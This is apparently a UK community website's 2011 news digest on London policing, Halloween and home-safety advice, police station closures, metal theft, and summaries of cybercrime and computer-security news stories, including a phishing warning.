"I would like to stress that our operations are not aimed at demonising young people, the large majority of whom behave safely and responsibly. However those intent on committing crime and anti-social behaviour will face the consequences."

In the period leading up to half term, schools officers have been reiterating safety tips to young people ahead of the festivities.

Officers are carrying out after-school patrols at key locations, such as town centres and transport hubs, to disrupt potential involvement in robbery, violence and other criminal activities which impact on our neighbourhoods.

They will also be using screening arches, as well as 'wands', as part of wider detection tactics to deter the carriage of weapons and will take part in test sale operations with Trading Standards regarding the sale of fireworks, alcohol and over-the-counter weapons.

Boroughs will receive central support for their operations, including mobile police units that will be deployed in response to particular threats. This additional support is controlled and directed from the MPS Central Command Complex [one of the three MPS 999 centres].

All Safer Neighbourhoods Teams will be patrolling at key times in town centres and other key locations.

In addition the MPS Safer Transport Command, funded by Transport for London (TfL), is running concurrently Operation Safebus, an intensive two-week operation to prevent youth disorder on the transport network during the autumn half term and encompassing Halloween and Bonfire Night.

Commander Jones added: "During this busy period, ensure you stay safe by staying with others and try to attend well organised events.

"When you are out, keep your valuables and high-value mobile phones out of sight, or leave them at home.

"If trick or treating, be aware of the impact of your actions on others - it may cause unnecessary worry to some of the more vulnerable members of our communities. Wherever possible parents should try to accompany their children.

"If you have any concerns, do not hesitate to contact your local Safer Neighbourhoods Team or in an emergency always dial 999.

"Do not forget the security of your home. If you are going out for the evening, ensure you have closed and locked your doors and windows and make sure that you leave lights on. The clocks go back on 30 October, so it may be dark before you expect it."

Kit Malthouse, Deputy Mayor for Policing, added: "We want people to enjoy themselves and also to ensure everyone feels safe going about their business and in their communities.

"London remains one of the safest cities to go out at night, but of course you should also employ common sense and be aware of what's happening around you.

"For the minority of people that might cause trouble, this will not be tolerated and the police will be ready to respond, quickly and decisively."

Key safety advice:

Advice to parents and carers:

- Make sure you know where your children are and who they are with.
- Go with them trick or treating if you can.
- Keep fireworks in a safe place in the house.
- Report any anti-social behaviour or concerns to your Safer Neighbourhoods Team.
- Attend organised events wherever possible.

Advice to young people:

- We want you to enjoy yourselves but won't tolerate unacceptable behaviour or anti-social behaviour.
- Ensure you are safe by staying with others.
- Attend organised events wherever possible.
- When trick or treating avoid knocking on the doors of elderly or vulnerable neighbours and causing unnecessary worry.

Keeping your home secure:

- Close and lock all your doors and windows, even if you are only going out for a few minutes.
- Make sure UPVC doors are properly locked with a key.
- Make sure the side and/or back gate is locked.
- Lock your shed or garage.
- Make sure that any valuables are out of sight.
- Leave some lights on if it will be dark before you get home.
- Don't leave your car keys or ID documents near doors, windows or your letterbox.

(24th October 2011)


 

A THIRD OF POLICE STATIONS COULD CLOSE TO PUBLIC
(Daily Mail, dated 3rd October 2011 author Chris Greenwood)
www.dailymail.co.uk  [Note 1]

More than one in three police stations may close their doors to the public within months as chief constables battle to cut costs. Many more are likely to reduce the number of hours they are open to the public as limited money is redirected to officers on the frontline.

Across 30 of the 43 forces in England and Wales, 350 of the 931 public counters at stations - 37 per cent - will be closed in the next six months.

Many more will cut the hours of public access, with 26 of the forces set to have no stations open around the clock. Crime victims will be told to contact call centres using non-emergency numbers, fill in internet forms or email the force.

Senior officers point out that many police stations have few visitors and people are increasingly turning to the telephone and internet to get in touch. They add that many are in Victorian buildings that are expensive to maintain and inadequate for modern policing.
Police counters are springing up in many areas, often in civic buildings such as libraries, leisure centres and town halls.

In some forces police chiefs are trying to recruit volunteers to man police stations in a last-ditch bid to keep them open. But they face substantial problems finding willing recruits with such plans in Birmingham being abandoned last month after no one came forward.

Nine forces admitted that half of their stations will close their doors. In London, up to 104 of its 136 stations may shut. Senior figures are considering proposals to only keep open one 24-hour station in each of the capital's 32 boroughs. In Manchester, South Yorkshire and Durham, at least six out of ten stations will no longer be open to the public.

The force in Devon and Cornwall has already ended public access at 36 of its 57 stations. Gloucestershire has closed 15 out of 29 public counters. In their place, the force has set up 11 'police points' in civic buildings, where appointments can be made to meet officers. Lancashire plans to close the doors at 21 of its 38 stations, while Essex is likely to close 21 out of 46 to the public.

Simon Reed, vice-chairman of the Police Federation, said the decision signals that 'policing is in retreat'. He said: 'This shows the lie behind the Government's policy on localism. Police officers will be working from bigger, more centralised bases and may have to travel long distances to get to their beat. 'Police stations are often a refuge for people and when these buildings are gone, they are gone forever.'

Lincolnshire Chief Constable Richard Crompton, who has national responsibility for local policing, said he and senior colleagues face tough budget choices. He said: 'All chief constables are totally committed to improving the visibility and accessibility of police officers and PCSOs, and are doing this through a range of strategies. 'Across the country we see lots of examples of premises such as libraries, community centres and supermarkets doubling up as police offices. 'Increasingly there is innovative use of the internet and social media which is making officers and staff far more accessible to the public.

'The introduction of the new non-emergency 101 telephone number across the country is again designed to improve police accessibility and contact with the public.'

(5th October 2011)


 

MET POLICE COUNTER-TERRORISM ROLE SHOULD END
(BBC News, dated 23rd September 2011)
www.bbc.co.uk

The Metropolitan Police's counter-terrorism role should be given to the new National Crime Agency when it becomes operational in 2013, MPs say.

The Home Affairs Select Committee says the change would mean less intervention in the Met by the Home Secretary and its accountability would be clearer.

Its adds that uncertainty over police reforms for England and Wales could be damaging to the 43 forces. The Home Office says its plans will lead to improvements in policing.

Under the Police Reform and Social Responsibility Bill, the government set out plans to introduce police and crime commissioners, elected by the public, in place of police authorities and greater collaboration between forces.

The wide-ranging report from the cross-party committee of MPs says the scale of the reforms was unprecedented and the scope for mistakes "accordingly large".

It said it was "unacceptable" that, with the National Policing Improvement Agency being phased out next spring, there were still no definite decisions about many of its functions. It called for the NPIA closure to be delayed until the end of 2012.

But the MPs said Scotland Yard should not be given any additional national policing functions in the wake of the phone-hacking scandal, which lead to the resignation of Sir Paul Stephenson as commissioner amid questions about the Met's investigation.

National services including the DNA database, the Police National Database, and the Police National Missing Persons Bureau also needed to be taken on by new organisations but such a move would not be helpful "either for it [the Met] or for the police service as a whole", it added.

The Met's Counter Terrorism Command, SO15, based at New Scotland Yard, has responsibility for protecting London and the UK from terrorism.

The Home Affairs Committee says the terrorist threat is a "national problem" there would be "advantages" in transferring responsibility to the National Crime Agency.

"Such a change would also allow for greater clarity in the leadership and accountability of the Metropolitan Police through the Mayor of London, since there would be less justification for involvement by the Home Secretary: For example, in appointing the Metropolitan Police Commissioner," it said.

The government's police commissioner plans have already been moved from May to November next year. The MPs called for other key reforms to be delayed and in its report cited the Police Superintendents' Association's view that "it feels like pieces of the new policing jigsaw are being put together in different places without having agreed what the picture on the box should be".

They also condemned IT services in the police service as a whole as "not fit for purpose".

'Warnings ignored'
 
Keith Vaz, the committee's chairman, said: "We are deeply concerned that more than a year after the publication of the consultation paper, many of the details of the government's proposals are still unclear...

"The police perform a difficult and dangerous task on behalf of the public and the continuing uncertainty about the future of many of the bodies involved in policing has the potential to be very damaging."

Paul McKeever, Chairman of the Police Federation of England and Wales said: "The government is choosing to ignore our warnings about the impact of planned reform and more worryingly they have turned a blind eye to the public's concerns about cuts to policing.

"We are not asking the prime minister to scrap all of the plans for reform, we are simply asking that he and his cabinet pause, and take time to reflect and listen to what the men and women who police our streets are saying."

The Home Office says it will review arrangements for the Met's counter-terrorism role after the London Olympics take place next year.

Policing minister Nick Herbert added: "The police bill has just received Royal Assent, we are saving over three million hours of officer time by cutting red tape, we are driving new arrangements for forces to buy equipment and services together and converge IT, and we are just about to appoint the head of the National Crime Agency.

"We are pushing ahead with reforms which will free the police to fight crime, deliver better value for the taxpayer, and give the public a stronger voice."

Police Reform and Social Responsibility Bill :

http://www.homeoffice.gov.uk/publications/about-us/legislation/police-reform-bill/

(2nd October 2011)


 

METROPOLITAN POLICE ACTUAL STAFFING LEVELS

The following figures are from the Metropolitan Police Authority website (www.mpa.gov.uk), as of 31st August 2011.

Total London Borough Police Officers : 19,459
Total London Borough Special Constables : 4,754
Total London Borough Staff (Admin) : 3,034
Total London Borough PCSO's : 3,725

Please remember that these are the total Police Officers and support that work in each of the London Boroughs. For example for the London Borough of Enfield :

Total Enfield Borough Police Officers : 569
Total Enfield Borough Special Constables : 152
Total Enfield Borough Staff (Admin) : 79
Total Enfield Borough PCSO's : 148

When you look at the figures for the total number of Police for London Boroughs there appears to be a major disparity between what the current London Mayor ( Boris Johnson ) and the previous incumbent ( Ken Livingstone ) have always quoted. That was something around 31,500 Police Officers. This is because many of the "London" Police Officers have a wider remit and actually cover the whole UK on subjects such as Counter Terrorism and Serious Crime as born out by the previous article.

So of the 31,677 Police Officers on the Metropolitan Police books, 12,218 Police Officers are not necessarily walking a London beat. So perhaps in the future London politicians will quote actual figures. Then we will know what the cuts actually mean.

(2nd October 2011)


 

MORE NEWS FROM MY SPAM INBOX-SEPTEMBER !
Category : phishing
 
My Internet Service Providers (ISP) spam filter appears to have again done a very good job this month. I have only received one suspect e-mail. Gone are the plethora of phishing e-mail purporting to be from the Halifax bank.

- From "Natwest Personal Banking"; subject "Restore your Access Online". The text of this phishing e-mail states "Our records shows that your online banking session has been blocked due to the following reasons". You are then requested to click on a bogus link and provide all of your banking details.

This e mails is bogus and is just phishing for your personal information. If you receive it, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

Only receiving one phishing e-mail is suspicious in itself. For months I have received an increasing number of phishing e-mails, let alone the "pharmacy" offers of various medicinal drugs. Recently there have been several arrests of hacker groups ( such as Anonymous and Lulzsec), but conversely the computing press have recently been reporting on the creation of mega-botnets (millions of corrupted computers ). [Botnet are a group of computers that have been corrupted by malicious software. These computers can then work en-masse under the control of an individual or group to commit criminal activity.]

So if these botnets are not sending out phishing e-mails, what mischief are they doing ?

(30th September 2011)


 

METAL THEFT : BRITAINS MOST ANNOYING CRIME WAVE
(BBC News, dated 28th September 2011)
www.bbc.co.uk

A train operator wants the law changed to tackle the rise in metal thefts. But what are the serious and sometimes strange consequences of this crime wave?

One copper cable theft from a railway line. The result? A total of 108 trains delayed, 17 hours worth of hold-ups for thousands of passengers and damage put at over £80,000. Plus, probably, £50 for the thieves.

And these are the consequences of just one of three thefts in West Yorkshire on the East Coast Main Line in a single night last month.

Network Rail, which is responsible for the UK's rail infrastructure, says the situation is getting worse. On average there are currently six thefts a day across the country.

The past year has seen a huge jump in metal thefts, with a rise in the price of metals such as copper and lead being blamed. The rise is being driven by global demand prompted by China and other booming economies.

This week train operator Nexus, which runs the Metro system in Tyne and Wear, has called for new regulation of scrapyards to stop the crime wave.

The plague of metal theft is having an impact on most people, not just rail companies.

Train delays

Next time your train is delayed or cancelled due to "signalling problems" there's a good chance it will be the fault of metal thieves.

Power and signalling cables, overhead line equipment, even the clips used to hold rails in place are all being stolen on a daily basis.

The consequence for rail users was a staggering 6,088 hours of delays last year, says Network Rail. It saw a 52% leap in the number of thefts from April 2010 to April this year, in total 995 incidents. It paid out £16.5m in repairs and compensation as a result.

Even if a single inch of cable is taken it can translate into long delays, says a spokeswoman for Network Rail. Some cables have up to 48 tiny copper strands in them that all need to be reconnected at both ends and tested before things can get moving again."We have dedicated response teams but it's not a quick job," she says.

British Transport Police say the thefts can vary greatly in size but are mostly petty - the "cottage industry end". "But the number of thefts is huge," says a spokesman. "It is our biggest crime problem in terms of frequency and our biggest challenge after counter-terrorism. "There are actually very small rewards in it for the thieves, but it's the instant cash that attracts them."

Cable thefts 2010 / 11

Scottish thefts : 192; arrests : 31
North Western thefts : 273; arrests : 109
North Eastern thefts : 1184; arrests : 273
Wales and Western thefts : 632; arrests : 218
London North thefts : 321; arrests : 112
London South thefts : 391; arrests : 94
London underground thefts : 123; arrests : 77


Fibreglass statues

Public artworks are increasingly being remade of fibreglass as a result of metal thefts. Not only is stolen work being replaced this way, in some cases public art is being taken into secure storage for safety and replaced with a fibreglass copy.

"It's a solution to an extremely depressing situation," says Peter Brown, chairman of the Public Monuments and Sculpture Association (PSMA). "What thieves don't seem to understand is how little metal there usually is in artworks and statues. They will make hardly any money from them. With the cost and effort of stealing them, you wonder why they bother."

But in some cases it is impossible to make replicas because the statues are too old and no original plans exist.

Blackpool Council has been forced to remove public artwork to safeguard it following two major thefts in July and August. Three of four lead-based figures were taken from a park where they had stood since 1926.

Two weeks later a section of one of two statues designed by Sir Peter Blake was stolen from the promenade. The remaining artworks are now in secure storage. The council says they will all be replaced with replicas.

"It's devastating," says Elaine Smith, chairwoman of the Blackpool Civic Trust. "These statues are part of Blackpool's heritage. To us they are priceless and these thieves will get a few pounds in cash for them."

It's not only artwork that is being changed. Surrey County Council now replaces missing road signs with plastic ones.

Gas explosions and power cuts

Power supply companies were the victim of around 6,000 metal thefts in 2010, equating to a 100% annual increase, according to industry figures.

One problem is that copper piping is often used to connect gas mains to gas meters in UK homes. In July a theft of copper pipes was linked to a gas explosion that wrecked a row of houses in Castleford, West Yorkshire. About 30 people had to be evacuated in the early hours of the morning.

"It's an increasing problem," says Tim Field from the Energy Network Association (ENA), the industry body for companies that carry electricity and gas to UK homes and businesses. "Thieves are taking small lengths of copper pipe that will make them a few pounds and leaving leaking gas that could cost people their lives."

Some of the pipes are on the outside of properties making them an easy target, but thieves dressed as workmen have even tricked their way into houses to strip them out.

Overhead cables and sub-stations are also targeted. Last month thieves in Wisbech, Cambridgeshire, caused an explosion which cut power to 1,700 homes. The Red Cross had to be called in to care for vulnerable residents.

"These power cuts not only cause chaos in homes, they hit hospitals and schools. It could even impact on 999 services," says Field.

Scrap dealers

The metal recycling industry in the UK is a lucrative business worth £5bn annually, but thefts are hitting it hard too. Over 15,000 tonnes of metal is stolen in the UK each year. Over half is taken from scrap dealers themselves, says Ian Hetherington, director general of the British Metals Recycling Association (BMRA).

"In one case recently thieves stole a train with two trucks full of scrap metal attached. They drove it down the line and offloaded the metal into lorries. Scrap dealers are spending a fortune on security, but the thieves are very resourceful."Like everyone else we have seen a progressive rise in thefts since 2006, but now the recession is really taking its toll. "We are seeing lot more smaller thefts, people who will jump over the fence, take some metal and then walk round to the front gate and try and sell it back to you."

The unexpected

Councils have reported streets being stripped of drain covers and supermarkets have lost hundreds of shopping trolleys in a matter of days. Letterboxes, charity clothing banks and door handles have also been taken.

And it seems nothing is off limits. Police have had reports of wheelchair ramps being stolen and children's playgrounds being stripped. Blackpool's model village, a popular tourist attraction, was even targeted.

"The small lead roof tiles on the miniature houses were stolen. The metal thieves are taking everything, I've never known anything like it," says Smith, from the Blackpool Civic Trust.

A quarter of Hertfordshire lost its broadband connection last year because of telecoms cable theft.

Lambeth Council in London has been forced to close a library after it was flooded in heavy rain because thieves stole the copper roof. The lead in the lettering on gravestones and memorials at a local cemetery have also been taken.

"It's appalling that thieves should target public buildings like libraries," says councillor Florence Nosegbe, a cabinet member for culture on Lambeth Council.

"But it's one thing to steal the copper from the roof of the library, it's another to damage memorials of loved ones by ripping out the lead lettering at the crematorium. This was a truly shocking and heartless act, for what would be only a few kilos of scrap metal."

(1st October 2011)


 

RUSSIAN HACKER SELLS HOME AND CARS TO PAY RBS
(BBC News, dated 20th September 2011 author Katia Moskvitch)
www.bbc.co.uk

A Russian hacker who breached the security of RBS' WorldPay service and stole $9m (£6m) has had his property sold to compensate the bank.

Viktor Pleshchuk's two flats and two cars, a BMW and a Lada, were auctioned off in Saint Petersburg on Monday.

According to a Russian news portal RIA Novosti, the sale raised 10m roubles (£200,000).

It reported that the money had been transferred to RBS, something the bank was unable to confirm.

Mr Pleshchuk and seven other Eastern European hackers managed to get their hands on the personal data of thousands of RBS customers in 2008.

They used the information to create fake debit cards and withdraw huge amounts of cash from ATMs in as many as 280 cities around the world.

The money was taken from 2,100 bank cash machines within 12 hours in the US, Russia, Estonia, Italy, Hong Kong, Japan and Canada.

Sophisticated plan
 
Kaspersky Labs chief security expert Alex Gostev said that the actual hacking was not the most complicated task the criminals had to deal with.
 
"The most interesting part was the final stage of the attack - the organisation of mass withdrawals all over the world," he said.

"They had to find more than 150 people in [numerous] cities, give each one of them the instructions and the fake cards, organise synchronised withdrawal - all of this shows that it was a group of highly skilled professionals".

Once arrested, Mr Pleshchuk pleaded guilty. In 2009, he and the rest of the hackers were also pursued by authorities in the US.

The eight were charged in the state of Georgia, where the Atlanta-based card-processing company, RBS WorldPay, was targeted.

In September 2010, Mr Pleshcuk received a six-year suspended sentence and an order to pay $8.9m (£6m) in restitution. He managed to avoid jail by pledging to sell his property and compensate the bank for the damage caused.

Online bank fraud
 
Brian Krebs, an American journalist specialising in cybercrime and computer security, recently tracked an ATM heist that was eerily similar to the RBS attack.

He explained that the attackers managed to get into the US-based FIS - Fidelity National Information Services - one of the world's largest processors of prepaid debit cards. They then planted a remote access trojan virus and used the data that they obtained to top up the reloadable prepaid debit cards they had compromised.

After that, they cloned the stolen debit cards, sent copies of them to co-conspirators in more than six countries, and raided the bank's accounts.

Mr Krebs said the FIS incident was very much like the RBS case, "clearly organised and professional". "When the funds on the cards reached close to zero, the hackers used their remote access to top up the cards again," he told BBC News. "They did this over and over and stole [millions] in less than 24 hours. These guys had access, they had a plan, and they had the means, and they executed it brilliantly."

Joseph Menn, a Financial Times reporter who covers technology-related privacy and security issues, said that similar attacks are still netting criminals millions. "The FBI said last week it is investigating online bank fraud crimes with losses totalling $85 million," said Mr Menn.

"The problem is that the technology used to commit such crimes is increasingly available and the penalties, as we have seen with the Pleshchuk case, are extremely light even in the rare event of an arrest, due largely to corruption.

"From a cost-benefit perspective, there is no reason for criminal enterprises not to double their bets on international bank crimes, so the problem will continue to get worse.

(21st September 2011)


 

CYBERCRIME CONFUSION MAY BE COSTING ECONOMY BILLIONS, SAY THINKTANK
(The Guardian, dated 14th September 2011, author Nick Hopkins)
www.guardian.co.uk  [Note 1]

Widespread confusion over the scale and nature of cyber-criminality is undermining efforts to tackle a menace that may be costing the economy billions of pounds a year, a report has warned.

The study says the government must take a firmer lead and provide people with clearer advice about what they should be doing to protect themselves from online fraud and theft.

Businesses have been at fault, too, it says, with company bosses delegating responsibility to IT specialists within their firms in a deliberate effort to keep a problem they may not understand "at arm's length".

The report, from the Chatham House thinktank, sets out how concern over a "vast" number of cyber-threats has led to a clamour for government and big business "to do something".

But this has proved difficult because, it says, "there is, in short, no agreement on the nature and gravity of the problem" and "little sense of governmental vision or leadership" either.

"The issue of cyber-risks needs to be made accessible for those who are neither familiar with technology nor highly IT-literate," the study warns.

It focuses on the potential vulnerability of those things deemed part of the "critical national infrastructure" (CNI). Among these are the emergency and health services and those businesses that provide energy, food transport and water.

This report argues that the CNI could now include Google and Amazon because both have become integral to "the functioning of a complex modern economy".

Its authors approached 100 of the UK's top businesses and banks. They found many staff believed cyber-threats were already out of control, with one bank claiming criminals were trying to "groom" members of staff to "compromise their corporate loyalty."

The report says: "One financial institution reported that the volume and sophistication of threats are now outstripping the organisation's capacity to respond.

"An interviewee at one major high street bank was distinctly lacking in optimism, noting that there seemed to be 'no natural predator to the bad guys' and predicting gloomily that 'we have crossed the Rubicon; we are not going to keep ahead of this.'"

But while there seems to be a consensus that the problem is growing, many companies appear to be taking it less than seriously, the report states.

"In most cases, they declared themselves to be aware of cyber-security threats. Yet these same organisations were willing … to accept an unexpectedly high level of risk. In several cases it was even decided that cyber-risk should be managed at arm's length from … the board and senior management. Paradoxically … a heightened perception of cyber- security risk is being met with diminished resources and interest."

The thinktank says some executives were guilty of having "deliberately pushed [the cyber problem] below the boardroom level in order to remove a complex and baffling problem from sight". Other senior managers seemed completely unaware of the danger to their firms.

The reports concludes that ministers must play "an integral role in informing wider society and raising levels of awareness" because there is no coherent picture of what is being targeted, and by whom; nor is their any clarity over which systems and services are potentially vulnerable to cyber-attack.

Last year's Strategic Defence and Security Review ringfenced an additional £650m to bolster the UK's cyber-defences, describing the issue as being of "tier-one" importance - the highest priority.

Earlier this year, a Cabinet Office-commissioned report put the annual cost of cyber-crime at £27bn, but some experts questioned the findings. They were concerned that the study involved Detica, a security firm that is part of the arms manufacturer BAE Systems. Detica funded the Chatham House report but the company was not involved either in researching or writing the study.

(20th September 2011)


 

CURRENT COMPUTER SECURITY NEWS

All the links under this heading are [Note 1]

The following 18 summaries of articles provide examples of what threats you may encounter during your "technological" day. These include using a computer or mobile at home or work. Some of the articles describe calamities suffered by organisations who should have known better!

The articles span a period of 3 months, the first one is the most recent.

BOT ARMY BEING ASSEMBLED, AWAITING ORDERS

Full article : http://cwonline.computerworld.com/t/7576556/930454165/531201/0/

A mammoth army of infected computers is being assembled, but it's unclear yet what purpose they will be put to.

Wave after wave of malicious email attachments has been sent out since August, and with average success rates for such mailings, millions of machines could be compromised. Once infected, the computers can be loaded with additional malware that can perform a range of activities, including spamming, participating in DDoS attacks, stealing bank credentials and compromising email and social-network accounts.

 

HACKERS FLIP CHARACTERS TO DISGUISE MALWARE

Full article : http://cwonline.computerworld.com/t/7555041/930454165/529662/0/

Hackers are using a new trick to cloak malicious files by disguising their Windows file extensions to make them appear safe to download, a Czech security company warned today.

The exploit, dubbed "Unitrix" by Avast Software, abuses Unicode for right-to-left languages -- such as Arabic or Hebrew -- to mask Windows executable files (.exe) as innocuous graphic images (.jpg) or Word documents (.doc).

Unicode is the computer industry standard for representing text with alpha-numeric codes.

The Unitrix exploit uses a hidden code (U+202E) that overrides right-to-left characters to display an executable file as something entirely different. Using that ploy, hackers can disguise a malicious file that ends with gpj.exe as a supposedly-safer photo_D18727_Collexe.jpg by reversing the last six characters of the former.

 

HACKERS STEAL SSL CERTIFICATES FOR CIA, MI6 AND MOSSAD

Full article : http://cwonline.computerworld.com/t/7548091/930454165/529288/0/

The tally of digital certificates stolen from a Dutch company in July has exploded to more than 500, including ones for intelligence services like the CIA, the U.K.'s MI6 and Israel's Mossad, a Mozilla developer said Sunday.

The confirmed count of fraudulently-issued SSL (secure socket layer) certificates now stands at 531, said Gervase Markham, a Mozilla developer who is part of the team that has been working to modify Firefox to blocks all sites signed with the purloined certificates.

Among the affected domains, said Markham, are those for the CIA, MI6, Mossad, Microsoft, Yahoo, Skype, Facebook, Twitter and Microsoft's Windows Update service.

 

MAN GETS 6 YEARS FOR HACKING VICTIMS' COMPUTERS TO EXTORT PHOTOS

Full Article : www.computerworld.com/s/article/9219701


A 32-year-old paraplegic was sentenced to six years in prison for infecting more than 100 computers in a quest for financial information, nude photographs and thrills.

Luis Mijangos worked as a freelance computer consultant in Santa Ana, California, earning about $1,000 per week writing programs and building websites. But he lived a double life, also earning as much as $3,000 per day hacking and stealing financial information from his victims.

 

HACKERS MAY HAVE STOLEN OVER 200 SSL CERTIFICATES

Full article : www.computerworld.com/s/article/9219663

Hackers may have obtained more than 200 digital certificates from a Dutch company after breaking into its network, including ones for Mozilla, Yahoo and the Tor project, a security researcher reported today.

 

BRACE FOR EMAIL-ATTACHMENT MALWARE SPREE

Full article : http://cwonline.computerworld.com/t/7499644/930454165/526189/0/

A sizeable spike in malicious email attachments is just subsiding, but if history is any indicator, several smaller spikes are about to follow that use even more deceptive means than their predecessors.

The recent surge, fueled in large part by a flood of phony messages from UPS, is similar to one observed at the end of March in that the messages urge recipients to open an attachment that releases the malware on victims' machines, according to Internet security firm Commtouch.

The earlier wave used a wider variety of package-delivery services as senders, including FedEx and DHL, but the latest outbreak employs a wider variety of messages such as, "Dear client, recipient's address is wrong", "Dear User, Delivery Confirmation: FAILED", and "Dear Client, We are not able to delivery [sic] the postal package", according to the Commtouch blog. All the messages then instruct the recipient to open the attachment that contains the malware, claiming it is an invoice or a form that needs to be filled out.

FIRED TECHY CREATED VIRTUAL CHAOS AT PHARMACEUTICAL COMPANY

Full article : http://cwonline.computerworld.com/t/7498945/930454166/526096/0/

Logging in from a McDonald's restaurant, a former employee of a U.S. pharmaceutical company was able to wipe out most of the company's computer infrastructure earlier this year.

Jason Cornish, 37, formerly an IT staffer at the U.S. subsidiary of Japanese drug-maker Shionogi, pleaded guilty Tuesday to computer intrusion charges in connection with the attack on Feb. 3, 2011. He wiped out 15 VMware host systems that were running e-mail, order tracking, financial and other services for the Florham Park, New Jersey, company.

"The Feb. 3 attack effectively froze Shionogi's operations for a number of days, leaving company employees unable to ship product, to cut checks, or even to communicate via e-mail," the U.S. Department of Justice said in court filings. Total cost to Shionogi: US$800,000.

Cornish had resigned from the company in July 2010 after getting into a dispute with management, but he had been kept on as a consultant for two more months.

Then, in September 2010, the drug-maker laid off Cornish and other employees, but it did a bad job of revoking passwords to the network. One employee, who was Cornish's friend and former boss, allegedly refused to hand over network passwords to company officials and eventually was fired because of this.

CHINA HIT BY 480,000 TRJAN HORSE ATTACKS IN 2010

Full article : http://cwonline.computerworld.com/t/7484923/930454165/525247/0/

China said it saw close to 480,000 Trojan horse attacks in 2010, with almost half originating from outside the country, according to a government security agency.

China's National Computer Network Emergency Response Technical Team (CNCERT) released some of the figures Tuesday from an upcoming annual report. Of the 221,000 attacks that originated outside of China, 14.7% came from the U.S., while another 8.8% came from India.

The figures have gained media attention after security vendor McAfee reported a massive cyber attack that stole sensitive information from 72 companies and organizations. While McAfee did not name the group behind the hacking attempts, analysts suspect China is behind the attack because of the targets involved.



HAS YOUR COMPANY BEEN INFILTRATED BY THE SHADY RAT HACK ?

Full article : http://cwonline.computerworld.com/t/7477178/930454165/524124/0/


When McAfee released its Operation Shady Rat hacking report in early August, it didn't name all of the organizations it thought could have been hacked as part of a large, five-year ongoing campaign. Yours might be one of them.

McAfee said 72 organizations worldwide were hacked ( 49 in the USA and 2 in the UK), according log reports in a server that McAfee gained access to. It listed a few, such as the U.N., the U.S. International Trade Organization and the World Anti-Doping Agency, but most were unnamed.

The company's report generated wide media coverage and a breathless recount of the continued threat that sophisticated hackers pose. China even responded, saying in its official People's Daily newspaper on Friday that linking every cyberattack to the country is "irresponsible."

MOBILE MALWARE REALITY CHECK

Full article : http://cwonline.computerworld.com/t/7469775/930454165/523472/0/


Malicious software is leaping from PCs to cell phones, as malware makers target the platform in hopes of making a quick buck. An infected app released into the Android Market can infect several thousand users' phones before anyone discovers the presence of the malware. Examples include the infected DroidDream and Plankton Android apps.

Though the extent of Android malware has been overstated, it's best to learn now how to protect yourself and your data from attacks, instead of waiting until mobile malware becomes a more serious problem.

 

SPYEYE TROJAN DEFEATING ONLINE BANKING DEFENCES

Full article : http://cwonline.computerworld.com/t/7460942/930454165/522984/0/

Banks are facing more trouble from SpyEye, a piece of malicious software that steals money from people's online bank accounts, according to new research from security vendor Trusteer.

SpyEye is a particularly nasty piece of malicious software: it can harvest credentials for online accounts and also initiate transactions as a person is logged into their account, literally making it possible to watch their bank balance drop by the second.

In its latest versions, SpyEye has been modified with new code designed to evade advanced systems banks have put in place to try and block fraudulent transactions.

 

ITALY'S CYBERCRIME POLICE HACKED

Full article : http://cwonline.computerworld.com/t/7457906/930454165/522792/0/

Italy's specialist police unit responsible for combating cybercrime suffered an embarrassing hack Monday by members of the loosely knit Anonymous hacktivist galaxy.

In a communique posted on Twitter, the hacker group claimed to have obtained more than 8GB of internal data from what it called the "Homeland Security Cyber Operation Unit in Europe" and said it would publish all the material it had obtained from its Italian branch.

The group said it had "owned" the server of the National Center for Computer Crime and the Protection of Critical Infrastructure (CNAIPIC) of the Italian police and would be publishing the material via the LulzSec and Anonymous communities under its #AntiSec campaign.

ROMANIAN AUTHORITIES TARGET INTERNET FRAUD SCHEME

Full article : http://cwonline.computerworld.com/t/7438326/930454165/521480/0


Romanian law enforcement officials on Thursday executed 117 searches targeting more than 100 people in an ongoing effort with the U.S. Department of Justice to break up a large Internet auction fraud scheme, the DOJ said.

The coordinated effort between Romanian and U.S. law enforcement agencies has resulted in the arrest of more than 100 people in Romania and the U.S. since 2010, the DOJ said Friday.

In many of the cases, conspirators located in Romania would post items for sale, including cars, motorcycles and boats, on Internet auction and other websites, the DOJ said in a press release. They would tell interested buyers in the U.S. to send money by wire transfer to fictitious names that they claimed to be employees of an escrow company.

The victims would not receive the items they paid for. Victims have lost more than US $10 million to the scheme, the DOJ said.


DDOS ATTACK IN MARCH LIKELY NORTH KOREAN WORK

Full article : http://cwonline.computerworld.com/t/7421068/930454166/519802/0/

The cyber attacks that paralyzed a handful of major South Korean websites earlier this year were almost certainly carried out by North Korea or parties allied with the country, computer security company McAfee said Tuesday in a report.

The company's analysis, carried out with the help of the South Korean and U.S. governments, is one of the most thorough yet published on the March attacks, and details how they were carried out, and why they were so difficult to counter.

In investigating the incident, the report draws clear parallels with a similar attack that knocked South Korean and U.S. websites offline in 2009 and comes to an unsettling conclusion: the attacks were likely designed to test South Korea's cyber defense and response, and could be the prelude of a much larger attack in the future.

HOW SECURE IS YOUR MOBILE DEVICE REALLY ?

Full article : http://cwonline.computerworld.com/t/7421068/930454166/519808/0/

With all the reports of mobile malware, vulnerabilities and attacks, things must seem pretty confusing to the consumer. Is the sky really falling? Let's explore some of the practical aspects of mobile security a bit from the consumer's point of view.

First off, it's always important to put these reports into perspective. Over the past few months, we've heard of malware in Google's Android Market, weaknesses in Apple's iOS and all sorts of other badness. Many, though not all, of these reports were released by folks who want to sell you a security add-on or service. That's not to say the reports were false, but their severity should always be taken with a grain of salt.

 

HOW TO LIVE WITH MALWARE INFECTIONS

Full article : http://cwonline.computerworld.com/t/7418567/930454165/519676/0/

How can you be sure your organization doesn't have insidious viruses or other malware lurking within systems and applications, waiting to inflict damage? You can't.

Malware has grown sophisticated to the point where there's no guarantee that it's actually gone, even when you've applied the latest antivirus software. Making matters worse, IT infrastructures are becoming much more complex -- with an ever-growing population of devices that give malware even more possible entry points.

Executives are big, fat, juicy targets for spearphishing attacks. Learn how to protect them from being harpooned. Find out how to block the viruses, worms, and other malware that threaten your business.

The advice in the article is obviously meant for business, but it is also useful for the domestic user.

SPEAR PHISHERS SHARPEN SKILLS, CRAFT "INCRIDIBLE" ATTACKS, SAY EXPERTS

Full article : http://cwonline.computerworld.com/t/7385360/930454165/516673/0/


Recent break-ins at high-profile targets like the International Monetary Fund (IMF) demonstrate just how proficient hackers have become at "spear phishing," researchers said today.

